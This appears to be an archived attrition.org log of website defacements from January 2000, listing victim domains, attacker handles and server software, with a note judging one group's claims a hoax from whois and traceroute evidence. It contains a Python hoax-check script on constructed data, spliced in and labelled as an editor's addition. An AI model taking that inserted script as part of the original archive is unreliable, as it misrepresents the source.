Defaced domain: secure.411now.net Site Title: Internet Marketing Solutinos of Florida Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/secure.411now.net Defaced by: m0zy Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mct.nu Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.mct.nu Defaced by: vorlon Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.saclant.nato.int Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.saclant.nato.int Defaced by: confusion Operating System: Windows 95 (Simple, Secure Web Server 1.1) Potentially offensive content on defaced page. Defaced domain: ioc.unesco.org Site title: UNESCO's Intergovernmental Oceanographic Commission Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/ioc.unesco.org Defaced by: confusion Operating System: Windows NT 4.0 Potentially offensive content on defaced page. Defaced domain: www.lutherancentraldist.org Site Title: Lutheran Church-Canada, Central District Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.lutherancentraldist.org Defaced by: Anti_Taco Operating System: Windows (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.homeport.bc.ca Site Title: Bazan Bay o/a HomePort Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.homeport.bc.ca Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: bps.boston.k12.ma.us Site Title: Massachusetts K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/bps.boston.k12.ma.us Defaced by: BoBaBc Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.perfectsite.com.br
Site Title: CONSERVADORA E INSTALADORA DE MAQUINAS E APARELHOS
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.perfectsite.com.br
Defaced by: KabraLzZ
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.weatherford.com
Site Title: Weatherford Entra
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.weatherford.com
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.conferencecoll.com
Site Title: Conference Coll, Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.conferencecoll.com
Defaced by: p(H)
Operating System: BSDI
Potentially offensive content on defaced page.

Defaced domain: rgshaw.boston.k12.ma.us
Site Title: Massachusetts K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/rgshaw.boston.k12.ma.us
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.torahacademy.org
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.torahacademy.org
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.21 99.12.19 by
Potentially offensive content on defaced page.

Defaced domain: www.homeport.bc.ca
Site Title: Bazan Bay o/a HomePort
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.homeport.bc.ca
Operating System: Windows NT (IIS/4.0)
Previously defaced on today by
Potentially offensive content on defaced page.

Defaced domain: www.mms.gov
Site Title: MMS
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.mms.gov
Defaced by: forrest
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.10.29, 99.10.28, 99.12.31 by fuqrag, fuqrag, hv2k
Potentially offensive content on defaced page.
Defaced domain: www.ibe.ane.ru
Site Title: Institute of Business & Economics, Russia Academy of National Economy
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.ibe.ane.ru
Defaced by: sh00ter
Operating System: Windows NT

Defaced domain: www.tsururestaurant.com
Site Title: Tsuru Restaurant
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.tsururestaurant.com
Defaced by: lysergik
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.cisasailing.org
Site Title: CISA
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.cisasailing.org
Defaced by: Team Echo
Operating System: Windows NT (WebSitePro)
Potentially offensive content on defaced page.

Defaced domain: www.telematic.edu.pe
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.telematic.edu.pe
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.yepp.com
Site Title: Yorktown Printing Corp
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.yepp.com
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.sd.fisc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.sd.fisc.navy.mil
Defaced by: DHC
Operating System: WinNT

Defaced domain: www.infopuc.pucp.edu.pe
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.infopuc.pucp.edu.pe
Defaced by: Team Echo
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.dabassment.com
Site Title: FREDC NOSE
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.dabassment.com
Operating System: Solaris 2.x
Potentially offensive content on defaced page.
Defaced domain: www.redhotprice.com
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.redhotprice.com
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.yorktownchamber.org
Site Title: New Yorktown Chamber of Commerce
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.yorktownchamber.org
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.nypennysaver.com
Site Title: Yorktown Electronic Publishing
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.nypennysaver.com
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.pennysaver.net
Site Title: Yorktown Electronic Publishing
Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.pennysaver.net
Defaced by: lysergik
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.kaplan.com.co
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.kaplan.com.co
Defaced by: sh00tR
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.globaltex.org
Site Title: Globaltex Corp
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.globaltex.org
Defaced by: pH
Operating System: BSDI
Potentially offensive content on defaced page.

Defaced domain: www.safersex.co.za
Site Title: Safer Sex
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.safersex.co.za
Defaced by: #Dorknet
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.cdcs.com
Site Title: C & D Consulting, LLC
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cdcs.com
Defaced by: slash
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.11.14 by DHC
Potentially offensive content on defaced page.

Defaced domain: www.ipuf.sc.gov.br
Site Title: Universidade Federal de Santa Catarina
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.ipuf.sc.gov.br
Defaced by: Fuck Spy
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.mitinci.gob.pe
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.mitinci.gob.pe
Defaced by: Shredder
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cpa.sp.gov.br
Site Title: Governo Do Estado De Sao Paulo
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cpa.sp.gov.br
Defaced by: Fuck SPy
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.transportes.gov.br
Site Title: Ministerio Dos Transportes
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.transportes.gov.br
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.psemu.com
Site Title: The New Planet
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.psemu.com
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.cra.ed.cr
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cra.ed.cr
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.ajga.org
Site Title: American Junior Golf Association
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.ajga.org
Defaced by: lysergik
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.
Defaced domain: www.armeniansisters.org
Site Title: Armenian Sisters' Academy
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.armeniansisters.org
Defaced by: HijAk Team
Operating System: BSDI
Potentially offensive content on defaced page.

The alleged hacks of:

   http://www.armeniansisters.org
   http://www.usabia.org
   http://www.armgate.com
   http://www.armtv.com

have been determined to be hoaxes. The group claiming to do it called
themselves "hijak team". Looking at the NIC registry for the first two
domains:

Registrant:
US-Armenia Business & Investment Association (USABIA-DOM)
   hijak st
   azerbaina for ever
   Baku, Az 3700001
   AZ

   Domain Name: USABIA.ORG

   Administrative Contact, Technical Contact, Zone Contact:
      netninja, Sanjay  (SP335)  infowar@ANTIONLINE.ORG
      99412666666 (FAX) 94412666666
   Billing Contact:
      netninja, Sanjay  (SP335)  infowar@ANTIONLINE.ORG
      99412666666 (FAX) 94412666666

Combine that with the second two domains (which appear to be legitimate),
and the fact that the first two were hosted on free servers (Hypermart),
and it appears this group and their actions are a big hoax.

forced ~$ traceroute www.usabia.org
traceroute to www.usabia.org (206.253.222.119), 30 hops max, 40 byte packets
[snip..]
 8  internapsea-gw.customer.ALTER.NET (157.130.178.34)  36.115 ms  36.477 ms  37.414 ms
 9  border3bs.fe0-0-0-fenet1.sea.pnap.net (206.253.192.139)  37.879 ms  35.513 ms  39.053 ms
10  server28.hypermart.net (206.253.222.119)  36.521 ms  39.691 ms  38.48 ms

Defaced domain: www.lucent.com.tw
Site Title: Lucent Technologies Co
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.lucent.com.tw
Defaced by: inferno.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.jbflint.com
Site Title: Jim Bell & Son, Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.jbflint.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
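The hoax call above rests on three checks that are worth automating when a claimed defacement comes in: does the registrant record for the "victim" domain look like it was written by the claimants, are the contact details placeholder junk, and does the host sit on a free/shared hosting account anyone could have opened. The script below is an added example and not part of the attrition.org notice or the HWA text; it re-implements those checks over a constructed whois record and traceroute modelled on the ones quoted above (the `FREE_HOSTS` list, the `hoax_indicators` name and the 5-digit-run threshold are the editor's assumptions, not anything the notice specifies).

```python
import re
from dataclasses import dataclass, field

# Constructed sample inputs, modelled on the whois and traceroute output
# quoted in the hoax note above. Not live data.
SAMPLE_WHOIS = """\
Registrant:
US-Armenia Business & Investment Association (USABIA-DOM)
   hijak st
   azerbaina for ever
   Baku, Az 3700001
   AZ

   Domain Name: USABIA.ORG

   Administrative Contact, Technical Contact, Zone Contact:
      netninja, Sanjay  (SP335)  infowar@ANTIONLINE.ORG
      99412666666 (FAX) 94412666666
"""
SAMPLE_TRACEROUTE = """\
traceroute to www.usabia.org (206.253.222.119), 30 hops max, 40 byte packets
 9  border3bs.fe0-0-0-fenet1.sea.pnap.net (206.253.192.139)  37.879 ms  35.513 ms  39.053 ms
10  server28.hypermart.net (206.253.222.119)  36.521 ms  39.691 ms  38.48 ms
"""
# Assumed free/shared hosting providers; hypermart.net is the one named in
# the note, the rest are illustrative and should be extended for real use.
FREE_HOSTS = {"hypermart.net", "geocities.com", "tripod.com"}


@dataclass
class WhoisRecord:
    domain: str = ""
    registrant_lines: list = field(default_factory=list)
    emails: list = field(default_factory=list)
    phones: list = field(default_factory=list)


def parse_whois(text):
    """Pull the registrant block, contact e-mails and phone numbers out of a
    classic InterNIC-style whois listing (the layout shown in the note)."""
    rec = WhoisRecord()
    in_registrant = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                      # blank line closes the registrant block
            in_registrant = False
            continue
        if line.startswith("Registrant:"):
            in_registrant = True
            continue
        m = re.match(r"Domain Name:\s*(\S+)", line)
        if m:
            rec.domain = m.group(1).lower()
            continue
        if in_registrant:
            rec.registrant_lines.append(line)
        rec.emails += [e.lower() for e in re.findall(r"[\w.+-]+@[\w.-]+", line)]
        rec.phones += re.findall(r"\b\d{9,15}\b", line)
    return rec


def last_hop(traceroute_text):
    """Return (hostname, ip) of the final numbered hop, or None."""
    hop = None
    for line in traceroute_text.splitlines():
        m = re.match(r"\s*\d+\s+(\S+)\s+\((\d+\.\d+\.\d+\.\d+)\)", line)
        if m:
            hop = (m.group(1).lower(), m.group(2))
    return hop


def longest_digit_run(s):
    """Length of the longest run of one repeated character (666666 -> 6)."""
    best = run = 1 if s else 0
    for a, b in zip(s, s[1:]):
        run = run + 1 if a == b else 1
        best = max(best, run)
    return best


def hoax_indicators(claimed_group, whois_text, traceroute_text, free_hosts=FREE_HOSTS):
    """Apply the note's three checks; returns a list of human-readable findings."""
    rec = parse_whois(whois_text)
    found = []
    # 1. The registrant's own address names the attackers: they registered it.
    blob = " ".join(rec.registrant_lines).lower()
    for token in re.findall(r"[a-z0-9]+", claimed_group.lower()):
        if len(token) >= 4 and token in blob:
            found.append(f"registrant data names the claimant ({token!r})")
            break
    # 2. Placeholder-looking phone numbers (long runs of one digit).
    for p in sorted(set(rec.phones)):
        if longest_digit_run(p) >= 5:
            found.append(f"placeholder-looking phone number {p}")
    # 3. Contact e-mail not at the registered domain (weak on its own).
    for e in sorted(set(rec.emails)):
        if rec.domain and not e.endswith("@" + rec.domain):
            found.append(f"contact e-mail {e} is not at the registered domain (weak)")
    # 4. Final hop lands on a free/shared host the claimants could simply have signed up for.
    hop = last_hop(traceroute_text)
    if hop and ".".join(hop[0].split(".")[-2:]) in free_hosts:
        found.append(f"final hop {hop[0]} ({hop[1]}) is free/shared hosting")
    return found


if __name__ == "__main__":
    for line in hoax_indicators("hijak team", SAMPLE_WHOIS, SAMPLE_TRACEROUTE):
        print("-", line)
```

None of these findings proves a hoax by itself (plenty of legitimate registrants use a third-party contact address), which is why the e-mail check is marked weak; it is the combination, exactly as the note reasons, that carries the conclusion. A clean record with an in-domain contact, ordinary phone numbers and a final hop on the victim's own netblock produces an empty list.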
Defaced domain: www.imsoelite.com
Site Title: Matthew Price
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.imsoelite.com
Operating System: Solaris 2.6 - 2.7
Potentially offensive content on defaced page.

Defaced domain: www.cyberenvoy.com
Site Title: Westech SDC, Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cyberenvoy.com
Defaced by: pH
Operating System: BSDI
Potentially offensive content on defaced page.

Defaced domain: www.riopoty.com.br
Site Title: Hotel Rio Poty S/A
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.riopoty.com.br
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.encamp.ad
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.encamp.ad
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.familycomputerworkshop.com
Site Title: Family Computer Workshop
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.familycomputerworkshop.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.30 99.12.29 by OHB BLN
Potentially offensive content on defaced page.

Defaced domain: ntserver01.thomastonschools.org
Site Title: Thomaston Public Schools
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/ntserver01.thomastonschools.org
Defaced by: Keebler Elf
Operating System: Windows NT (IBM-ICS/4.2.1.7)
Potentially offensive content on defaced page.

Defaced domain: www.segup.pa.gov.br
Site Title: Governo Do Estado Do Para
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.segup.pa.gov.br
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.aua.am
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.aua.am
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.aaesa.org
Site Title: American Association of Educational Service Agencies
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.aaesa.org
Defaced by: sh00tr
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.wpoint.com.br
Site Title: Net Sistema Telecomunicacoes Ltda
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.wpoint.com.br
Defaced by: OHB Team
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.hasp.org.br
Site Title: Hospital Adventista de São Paulo
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.hasp.org.br
Defaced by: The Killer
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.webavenue.co.za
Site Title: Web Avenue S.A
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.webavenue.co.za
Defaced by: #Dorknet
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.scania.co.uk
Site Title: Scania Computer Services Ltd
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.scania.co.uk
Defaced by: Dr_Delete
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.rsfm.co.za
Site Title: RSFM Online
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.rsfm.co.za
Defaced by: Tr1pl3 S31S
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.malealea.co.ls
Site Title: Malealea Lodge in Lesotho
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.malealea.co.ls
Defaced by: unknown
Operating System: Windows NT

Defaced domain: gospelmusic.com.br
Site Title: Open Computer Ltda
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/gospelmusic.com.br
Defaced by: blackc0de
Operating System: BSDI 3.x
Potentially offensive content on defaced page.

Defaced domain: www.starrett.com
Site Title: The L.S. Starrett Company
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.starrett.com
Defaced by: WOH
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.addsoft.net
Site Title: Addsoft Corporation
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.addsoft.net
Defaced by: WOH
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.scania.co.uk
Site Title: Scania Computer Services Ltd
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.scania.co.uk
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Previously defaced on today by redefacing is lame
Potentially offensive content on defaced page.

Defaced domain: www.addsoft.net
Site Title: Addsoft Corporation
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.addsoft.net
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Previously defaced on today by redefacing is lame
Potentially offensive content on defaced page.

Defaced domain: www.sex-100.com
Site Title: The Hang Loose Bastards
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.sex-100.com
Defaced by: Counter Culture
Operating System: Linux
Potentially offensive content on defaced page.
Defaced domain: www.sespa.pa.gov.br
Site Title: Governo Do Estado do Para
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.sespa.pa.gov.br
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cpa.sp.gov.br
Site Title: Governo Do Estado de Sao Paulo
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.cpa.sp.gov.br
Defaced by: OHB
Operating System: Windows NT (IIS/3.0)
Previously defaced on 00.01.22 by Fuck Spy
Potentially offensive content on defaced page.

Defaced domain: www7.prodepa.gov.br
Site Title: Prodepa - Processamento De Dados Do Estado Do Para
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www7.prodepa.gov.br
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.c-cube.net
Site Title: Convergent Communications Consultants Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/www.c-cube.net
Defaced by: ManicDVLN
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: bassd.labs.pulltheplug.com
Site Title: PullthePlug Tech.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/23/bassd.labs.pulltheplug.com
Defaced by: XBC
Operating System: FreeBSD

Defaced domain: www.clanberries.com
Site Title: Clanberries
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.clanberries.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.ncr.org
Site Title: National Church Residences
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.ncr.org
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: hcrp.fmrp.usp.br
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/hcrp.fmrp.usp.br
Defaced by: thekiller
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.
Defaced domain: www.camm.it
Site Title: Sviluppo Software C.A.D.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.camm.it
Defaced by: r4z
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.animerica.com
Site Title: Animerica
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.animerica.com
Defaced by: bansh33
Operating System: Windows NT

Defaced domain: www.ihip.pku.edu.cn
Site Title: Institute of Heavy Ion Physics
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.ihip.pku.edu.cn
Defaced by: Team Echo
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.teknology-source.com
Site Title: Technology Source
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.teknology-source.com
Defaced by: auto360
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.caligari.com
Site Title: Caligari Corp.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.caligari.com
Defaced by: messiah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: ryecityschools.lhric.org
Site Title: B.O.C.E.S. Southern Westchester
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/ryecityschools.lhric.org
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.wondergifts.com
Site Title: Wonder Gifts
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.wondergifts.com
Defaced by: auto360
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.webtology.com
Site Title: Webtology
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.webtology.com
Defaced by: auto360
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.whitefox.net
Site Title: C&M Consulting
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.whitefox.net
Defaced by: auto360
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.hoaa.com
Site Title: Home Association of America
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.hoaa.com
Defaced by: Team Echo
Operating System: BSDI 3.x
Potentially offensive content on defaced page.

Defaced domain: www.ransom.org
Site Title: Ransom Memorial Hospital
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.ransom.org
Defaced by: operação arrastão
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.eichertrail.com
Site Title: The Eicher Trail
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.eichertrail.com
Defaced by: t.s.g.u.
Operating System: Irix

Defaced domain: www.kkh.com.sg
Site Title: KK Women's & Children's Hospital
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.kkh.com.sg
Defaced by: operação arrastão
Operating System: Windows NT
ATTRITION Staff Comment: This is the second hospital defaced by this group

Defaced domain: www.subterminal.com
Site Title: Subterminal
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.subterminal.com
Defaced by: Artech
Operating System: Windows NT

Defaced domain: redelet.etfgo.br
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/redelet.etfgo.br
Defaced by: thekiller
Operating System: Linux
Potentially offensive content on defaced page.
Defaced domain: barney.wr.usgs.gov
Site Title: United States Geological Survey
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/barney.wr.usgs.gov
Defaced by: Dead-Socket
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.webzsite.com
Site Title: Webzsite.com - Brock Eastman
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.webzsite.com
Defaced by: cybernetix
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.campaignzone.com
Site Title: goGrrl Network
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.campaignzone.com
Defaced by: artech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.wretchedmusic.com
Site Title: Wretched
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.wretchedmusic.com
Defaced by: auto360
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.normsterling.com
Site Title: Norm Sterling, MPP
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.normsterling.com
Defaced by: moron
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.toy-soldier.com
Site Title: Toy Soldier
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.toy-soldier.com
Defaced by: BlacKcODe
Operating System: Windows NT

Defaced domain: www.ransom.org
Site Title: Ransom Memorial Hospital
Mirror: http://www.attrition.org/mirror/attrition/2000/01/25/www.ransom.org
Defaced by: p4riah
Operating System: Windows NT
Previously defaced on today by
Potentially offensive content on defaced page.
Defaced domain: www.sta.go.jp
Site Title: Japan Science and Technology Agency
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sta.go.jp
Defaced by: ch1n4
Previously defaced on: 01.24.00
Previously defaced by: Brazil p00 hackerz
Operating System: unknown
Potentially offensive content on defaced page.

Defaced domain: www.sta.go.jp
Site Title: Japan Science and Technology Agency
Date: Defaced on 01.24.00
Mirror: http://www.attrition.org/mirror/attrition/2000/01/24/www.sta.go.jp
Defaced by: Brazil p00 hackerz
Operating System: unknown
Potentially offensive content on defaced page.
Note: According to articles from AP and Reuters, this is the first known
defacement of a Japanese Government server.

Defaced domain: www.stat.go.jp
Site Title: Japanese Statistics Bureau
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.stat.go.jp
Defaced by: Miracle
Operating System: Solaris (CERN/3.0A)
Potentially offensive content on defaced page.
ATTRITION Staff Comment: This is the 3rd Japanese Government Web server defaced in days.

Defaced domain: www.chirolink.com
Site Title: Computer Information Exchange
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.chirolink.com
Defaced by: messiah
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.ecrc.gmu.edu
Site Title: George Mason University
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.ecrc.gmu.edu
Defaced by: Oystr and Klam
Operating System: Solaris 2.5x
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Mass hack w/ www.fecrc.com

Defaced domain: www.menofcolor2000.com
Site Title: Gemini Productions
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.menofcolor2000.com
Defaced by: pH
Operating System: BSDI 7.0
Potentially offensive content on defaced page.

Defaced domain: www.eli.com
Site Title: E. L. I. Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.eli.com
Defaced by: Potus and PurpZeY
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.riopoty.com.br
Site Title: Hotel Rio Poty S/A
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.riopoty.com.br
Defaced by: (can't read the names)
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.23 by OHB
Potentially offensive content on defaced page.

Defaced domain: www.data1000.com.br
Site Title: Data1000 Processamento De Dados LTDA
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.data1000.com.br
Defaced by: Crime Boys
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.koogrules.com
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.koogrules.com
Defaced by: BlackLion
Operating System: FreeBSD 2.2.1 - 4.0
Potentially offensive content on defaced page.

Defaced domain: www.texasbookdepot.com
Site Title: Texas Book Depot
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.texasbookdepot.com
Defaced by: ReDDCell
Operating System: BSDI 7.0
Potentially offensive content on defaced page.

Defaced domain: www.sex-1000.com
Site Title: Karen Vardanian
Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sex-1000.com
Defaced by: ???
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.23 by Counter Culture
Potentially offensive content on defaced page.

Defaced domain: www.sltins.com
Site Title: Southwestern Financial Services Corp
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.sltins.com
Defaced by: Crime Boys
Operating System: BSDI 3.x
Previously defaced on 99.08.15 by
Potentially offensive content on defaced page.
Defaced domain: www.sine.pi.gov.br
Site Title: Governo do Estado do Piaui
